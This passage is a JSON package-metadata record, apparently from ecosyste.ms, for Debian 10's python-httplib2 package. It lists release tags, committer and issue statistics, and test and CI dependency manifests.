2.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T13:16:28.776Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/python-httplib2?arch=source\u0026distro=debian-10\u0026repository_url=https://packages.debian.org/buster","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/python-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/python-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/python-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-20T11:37:11.797Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages/python-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages/python-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages/python-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages/python-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages/python-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages/python-httplib2/codemeta","maintainers":[],"registry":{"name":"debian-10","url":"https://packages.debian.org/buster","ecosystem":"debian","default":false,"packages_count":28836,"maintainers_count":0,"namespaces_count":3,"keywords_count":903,"github":"debian","metadata":{"codename":"buster","mirror":"http://archive.debian.org/debian","funded_packages_count":610},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:50.156Z","updated_at":"2026-08-25T05:03:28.562Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/namespaces"}}],"commits":{"id":4468,"full_name":"httplib2/httplib2","default_branch":"master","total_commits":559,"total_committers":75,"total_bot_commits":1,"total_bot_committers":1,"mean_commits":7.453333333333333,"dds":0.6082289803220036,"past_year_total_commits":18,"past_year_total_committers":3,"past_year_total_bot_commits":0,"past_year_total_bot_committers":0,"past_year_mean_commits":6.0,"past_year_dds":0.11111111111111116,"last_synced_at":"2026-08-19T11:08:39.682Z","last_synced_commit":"ba9bf505cd899f522f2bb58ca608444adf49afc1","created_at":"2023-03-07T09:20:56.035Z","updated_at":"2026-08-19T11:08:38.024Z","committers":[{"name":"Joe Gregorio","email":"jcgregorio@google.com","login":"jcgregorio","count":219},{"name":"jcgregorio","email":"devnull@localhost","login":null,"count":107},{"name":"Sergey Shepelev","email":"temotor@gmail.com","login":"temoto","count":96},{"name":"Jason R. Coombs","email":"jaraco@jaraco.com","login":"jaraco","count":20},{"name":"Augie Fackler","email":"durin42@gmail.com","login":"durin42","count":20},{"name":"jcgregorio","email":"jcgregorio@localhost","login":null,"count":6},{"name":"Alex Yu","email":"stinky2nine","login":"stinky2nine","count":6},{"name":"Alain Vongsouvanh","email":"alainv@google.com","login":"alainv","count":4},{"name":"Hugo van Kemenade","email":"hugovk","login":"hugovk","count":4},{"name":"Chris Dent","email":"chris.dent@gmail.com","login":"cdent","count":3},{"name":"Dirkjan Ochtman","email":"dirkjan@ochtman.nl","login":"djc","count":3},{"name":"Joe Gregorio","email":"joe.gregorio@gmail.com","login":null,"count":3},{"name":"David Korczynski","email":"david@adalogics.com","login":"DavidKorczynski","count":2},{"name":"Tim Gates","email":"tim.gates@iress.com","login":"timgates42","count":2},{"name":"Ryan Barrett","email":"git@ryanb.org","login":"snarfed","count":2},{"name":"jcgregorio","email":"jcgregorio@web82.webfaction.com","login":null,"count":2},{"name":"akhern","email":"akhern@gmail.com","login":null,"count":2},{"name":"Andy Sayler","email":"andy.sayler@gmail.com","login":"asayler","count":1},{"name":"Bu Sun Kim","email":"8822365+busunkim96","login":"busunkim96","count":1},{"name":"Cedric Veilleux","email":"veilleux.cedric@gmail.com","login":"cveilleux","count":1},{"name":"Cheng Ji","email":"chengji@google.com","login":"chengji-1e100","count":1},{"name":"Colin Watson","email":"cjwatson@debian.org","login":"cjwatson","count":1},{"name":"Cristobal","email":"cganterh@gmail.com","login":"cganterh","count":1},{"name":"Cyril Roelandt","email":"cyril@redhat.com","login":"CyrilRoelandteNovance","count":1},{"name":"David Sansome","email":"me@davidsansome.com","login":"davidsansome","count":1},{"name":"Dirk Boye","email":"dirkboye","login":"dirkboye","count":1},{"name":"Felix Yan","email":"felixonmars@archlinux.org","login":"felixonmars","count":1},{"name":"Florian Bruhin","email":"me@the-compiler.org","login":"The-Compiler","count":1},{"name":"Andrade","email":"andrade.vazquez@gmail.com","login":"choutos","count":1},{"name":"Alexander Schlarb","email":"alexander255","login":"alexander255","count":1},{"name":"Colin Stolley","email":"colin@sproutsocial.com","login":null,"count":1},{"name":"Evan Jones","email":"evan.jones@bluecore.com","login":null,"count":1},{"name":"zorba","email":"zorba@localhost","login":null,"count":1},{"name":"Alex Yu","email":"alexyu@alexyu-macpro.roam.corp.google.com","login":null,"count":1},{"name":"germanjoey","email":"jryan@newrelic.com","login":null,"count":1},{"name":"cclauss","email":"cclauss@bluewin.ch","login":null,"count":1},{"name":"Stefan Nordhausen","email":"stefan.nordhausen@immobilienscout24.de","login":null,"count":1},{"name":"Martin Carroll","email":"martin.carroll@nokia.com","login":"bearieq","count":1},{"name":"Matt Houglum","email":"houglum@google.com","login":"houglum","count":1},{"name":"Michael Farrell","email":"micolous@gmail.com","login":"micolous","count":1},{"name":"Michael Howitz","email":"mh@gocept.com","login":"icemac","count":1},{"name":"Michał Górny","email":"mgorny@gentoo.org","login":"mgorny","count":1},{"name":"Nicolas Noirbent","email":"nicolas.noirbent@lumapps.com","login":"noirbee","count":1},{"name":"Pavel Cahyna","email":"pcahyna@redhat.com","login":"pcahyna","count":1},{"name":"QuentiumYT","email":"quentin.lienhardt@gmail.com","login":"QuentiumYT","count":1},{"name":"Stephen Röttger","email":"sroettger@google.com","login":"sroettger","count":1},{"name":"Tristan Hill","email":"stan3","login":"stan3","count":1},{"name":"YYHYlh","email":"1044309102@qq.com","login":"YYHYlh","count":1},{"name":"cglouch","email":"10370863+cglouch","login":"cglouch","count":1},{"name":"dependabot[bot]","email":"49699333+dependabot[bot]","login":"dependabot[bot]","count":1},{"name":"eshokrgozar","email":"eshokrgo@gmail.com","login":"eshokrgozar","count":1},{"name":"hsmtkk","email":"hsmtkk","login":"hsmtkk","count":1},{"name":"i026e","email":"klev.paul@gmail.com","login":"i026e","count":1},{"name":"rahulrv1980","email":"rahulrv@yahoo.com","login":"rahulrv1980","count":1},{"name":"uu4k","email":"t.shimizu1115@gmail.com","login":"uu4k","count":1},{"name":"ziollek","email":"e.prace@gmail.com","login":"ziollek","count":1},{"name":"Phus Lu","email":"phuslu@hotmail.com","login":null,"count":1},{"name":"Igor Sobot","email":"43151172+igorsobot","login":"igorsobot","count":1},{"name":"Ivan Yurchenko","email":"ivanyu@aiven.io","login":"ivanyu","count":1},{"name":"Jacob Brunson","email":"github@jacobbrunson.com","login":"pearmaster","count":1},{"name":"Jakub Wilk","email":"jwilk@jwilk.net","login":"jwilk","count":1},{"name":"Jay Lee","email":"jay0lee@gmail.com","login":"jay0lee","count":1},{"name":"Johan","email":"184952+gustafsson","login":"gustafsson","count":1},{"name":"Jonas Baumann","email":"jone@jone.ch","login":"jone","count":1},{"name":"JumperFrog","email":"97535057+JumperFrog","login":"JumperFrog","count":1},{"name":"Justin Israel","email":"justinisrael@gmail.com","login":"justinfx","count":1},{"name":"KEBE","email":"mail@kebe7jun.com","login":"kebe7jun","count":1},{"name":"Karol Olko","email":"kolko@splunk.com","login":"kolko-splunk","count":1},{"name":"Konstantin Koshelev","email":"54158304+kkoshelev-g","login":"kkoshelev-g","count":1},{"name":"Kuba Skiepko","email":"skiepko@gmail.com","login":"kramarz","count":1},{"name":"Lukas Märdian","email":"lukas.maerdian@canonical.com","login":"slyon","count":1},{"name":"Luke Minall","email":"luke@lukeminall.co.uk","login":"lukeminall","count":1},{"name":"MaT1g3R","email":"peijun.ma@protonmail.com","login":"MaT1g3R","count":1},{"name":"Marco Cunha","email":"marco.cunha@gmail.com","login":"mcunha","count":1},{"name":"Marie","email":"Marie-Donnie","login":"Marie-Donnie","count":1}],"past_year_committers":[{"name":"Sergey Shepelev","email":"temotor@gmail.com","login":"temoto","count":16},{"name":"Nicolas Noirbent","email":"nicolas.noirbent@lumapps.com","login":"noirbee","count":1},{"name":"Karol Olko","email":"kolko@splunk.com","login":"kolko-splunk","count":1}],"commits_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/commits","host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-08-20T00:00:10.776Z","repositories_count":6752313,"commits_count":978410056,"contributors_count":41242979,"owners_count":1359078,"committers_count":3353170,"icon_url":"https://github.com/github.png","host_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories"}},"issues":{"table":{"full_name":"httplib2/httplib2","html_url":"https://github.com/httplib2/httplib2","last_synced_at":"2026-08-24T13:45:52.705Z","status":null,"issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":4,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":4,"past_year_avg_comments_per_issue":3.0,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"created_at":"2023-05-10T14:52:58.451Z","updated_at":"2026-08-24T13:45:52.705Z","repository_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","issue_labels_count":{"table":{"question":11,"bug":9,"feature-proxy":5,"enhancement":4,"feature-security":2,"feedback wanted":2,"duplicate":1,"help wanted":1,"feature-cache":1}},"pull_request_labels_count":{"table":{"dependencies":4,"enhancement":4,"feedback wanted":2,"feature-proxy":2,"bug":2,"feature-security":1,"python":1}},"issue_author_associations_count":{"table":{"NONE":54,"CONTRIBUTOR":8,"MEMBER":2}},"pull_request_author_associations_count":{"table":{"CONTRIBUTOR":33,"NONE":19,"MEMBER":9}},"issue_authors":{"table":{"yohplala":2,"qo4on":2,"temoto":2,"mgorny":2,"kloczek":2,"NickGoog":1,"neilodonuts":1,"logachev":1,"lryx":1,"jsanpe":1,"johnfink8":1,"icegood":1,"zoosmand":1,"andrewmcguinness":1,"alexhudson":1,"dpocock":1,"timgates42":1,"mborsetti":1,"menta78":1,"workingxx92":1,"mlissner":1,"lizhipeng1992":1,"nidbCN":1,"softyoungha":1,"Colecf":1,"jpfabris":1,"kkoshelev-g":1,"gamename":1,"casperdcl":1,"busunkim96":1,"slyon":1,"mtelka":1,"weyou":1,"SergeyMatsiupa":1,"kmaasrud":1,"DavidKorczynski":1,"wally-yu":1,"bpaczkowski":1,"joaomsan":1,"jpmckinney":1,"fidelleon":1,"rileyk90":1,"vankatamarinov":1,"hoss-stack":1,"supermarin":1,"cjwatson":1,"anishj-crest":1,"honux":1,"1oglop1":1,"alexeiser":1,"dkwo":1,"slavkoja":1,"mengyyy":1,"limburgher":1,"tirkarthi":1,"bughunter2":1,"mahirchavda":1,"hyejung-rachel":1,"PraveenKavindu":1}},"pull_request_authors":{"table":{"temoto":9,"hugovk":4,"dependabot[bot]":4,"busunkim96":2,"DavidKorczynski":2,"dpocock":2,"timgates42":2,"CyrilRoelandteNovance":2,"asmaakinawy":1,"pcahyna":1,"smurfix":1,"cglouch":1,"devjoe":1,"ziollek":1,"igorsobot":1,"cjwatson":1,"ivanyu":1,"icegood":1,"jamescasbon":1,"s5x":1,"yamahubuki":1,"slyon":1,"jroitgrund":1,"The-Compiler":1,"noirbee":1,"kloczek":1,"mgorny":1,"YYHYlh":1,"ryansmith940":1,"gustafsson":1,"JumperFrog":1,"pearmaster":1,"weyou":1,"mcunha":1,"adamchainz":1,"kolko-splunk":1,"gmixo":1,"QuentiumYT":1,"eshokrgozar":1,"enothen":1,"apoorvdarshan":1,"kramarz":1}},"host":{"table":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-08-25T00:00:09.459Z","repositories_count":16355184,"issues_count":42497104,"pull_requests_count":136066256,"authors_count":11525578,"icon_url":"https://github.com/github.png","host_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories","owners_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/owners","authors_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors"}},"past_year_issue_labels_count":{"table":{"bug":1,"feature-proxy":1}},"past_year_pull_request_labels_count":{"table":{"dependencies":1,"enhancement":1,"feature-security":1,"python":1}},"past_year_issue_author_associations_count":{"table":{"NONE":4}},"past_year_pull_request_author_associations_count":{"table":{"CONTRIBUTOR":3,"MEMBER":1,"NONE":1}},"past_year_issue_authors":{"table":{"alexeiser":1,"johnfink8":1,"jpmckinney":1,"softyoungha":1}},"past_year_pull_request_authors":{"table":{"apoorvdarshan":1,"dependabot[bot]":1,"kolko-splunk":1,"noirbee":1,"temoto":1}},"maintainers":[{"table":{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}}],"active_maintainers":[{"table":{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}}]}},"events":{"total":{"CreateEvent":6,"DeleteEvent":7,"ForkEvent":2,"IssueCommentEvent":14,"IssuesEvent":3,"PullRequestEvent":4,"PushEvent":17,"WatchEvent":14},"last_year":{"CreateEvent":6,"DeleteEvent":7,"ForkEvent":1,"IssueCommentEvent":12,"IssuesEvent":1,"PullRequestEvent":4,"PushEvent":14,"WatchEvent":1}},"keywords":["http","http-client","network","python"],"dependencies":[{"ecosystem":"pypi","filepath":"requirements-test.txt","sha":null,"kind":"manifest","created_at":"2022-08-06T18:01:44.766Z","updated_at":"2022-08-06T18:01:44.766Z","repository_link":"https://github.com/httplib2/httplib2/blob/master/requirements-test.txt","dependencies":[{"id":585943861,"package_name":"cryptography","ecosystem":"pypi","requirements":"==35.0.0","direct":true,"kind":"test","optional":false},{"id":585943862,"package_name":"flake8","ecosystem":"pypi","requirements":"==3.9.2","direct":true,"kind":"test","optional":false},{"id":585943863,"package_name":"future","ecosystem":"pypi","requirements":"==0.16.0","direct":true,"kind":"test","optional":false},{"id":585943864,"package_name":"mock","ecosystem":"pypi","requirements":"==2.0.0","direct":true,"kind":"test","optional":false},{"id":585943865,"package_name":"pytest-cov","ecosystem":"pypi","requirements":"==2.12.1","direct":true,"kind":"test","optional":false},{"id":585943866,"package_name":"pytest-forked","ecosystem":"pypi","requirements":"==1.3.0","direct":true,"kind":"test","optional":false},{"id":585943867,"package_name":"pytest-randomly","ecosystem":"pypi","requirements":"==1.2.3","direct":true,"kind":"test","optional":false},{"id":585943868,"package_name":"pytest-timeout","ecosystem":"pypi","requirements":"==1.4.2","direct":true,"kind":"test","optional":false},{"id":585943869,"package_name":"pytest-xdist","ecosystem":"pypi","requirements":"==1.34.0","direct":true,"kind":"test","optional":false},{"id":585943870,"package_name":"pytest","ecosystem":"pypi","requirements":"==4.6.11","direct":true,"kind":"test","optional":false},{"id":585943871,"package_name":"pytest","ecosystem":"pypi","requirements":"==6.1.2","direct":true,"kind":"test","optional":false},{"id":585943872,"package_name":"pytest","ecosystem":"pypi","requirements":"==6.2.5","direct":true,"kind":"test","optional":false},{"id":585943873,"package_name":"six","ecosystem":"pypi","requirements":"==1.10.0","direct":true,"kind":"test","optional":false}]},{"ecosystem":"pypi","filepath":"requirements.txt","sha":null,"kind":"manifest","created_at":"2022-08-06T18:01:44.776Z","updated_at":"2022-08-06T18:01:44.776Z","repository_link":"https://github.com/httplib2/httplib2/blob/master/requirements.txt","dependencies":[{"id":585943874,"package_name":"pyparsing","ecosystem":"pypi","requirements":"\u003e=2.4.2,\u003c3","direct":true,"kind":"runtime","optional":false},{"id":585943875,"package_name":"pyparsing","ecosystem":"pypi","requirements":"\u003e=2.4.2,\u003c4,","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/publish.yaml","sha":null,"kind":"manifest","created_at":"2023-01-13T13:31:15.861Z","updated_at":"2023-01-13T13:31:15.861Z","repository_link":"https://github.com/httplib2/httplib2/blob/master/.github/workflows/publish.yaml","dependencies":[{"id":6876109874,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6876109875,"package_name":"actions/cache","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6876109876,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6876109877,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6876109878,"package_name":"actions/download-artifact","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/style.yaml","sha":null,"kind":"manifest","created_at":"2023-01-13T13:31:15.903Z","updated_at":"2023-01-13T13:31:15.903Z","repository_link":"https://github.com/httplib2/httplib2/blob/master/.github/workflows/style.yaml","dependencies":[{"id":6876109879,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6876109880,"package_name":"actions/cache","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6876109881,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/test.yaml","sha":null,"kind":"manifest","created_at":"2023-01-13T13:31:15.940Z","updated_at":"2023-01-13T13:31:15.940Z","repository_link":"https://github.com/httplib2/httplib2/blob/master/.github/workflows/test.yaml","dependencies":[{"id":6876109882,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6876109883,"package_name":"actions/cache","ecosystem":"actions","requirements":"v2","direct":tr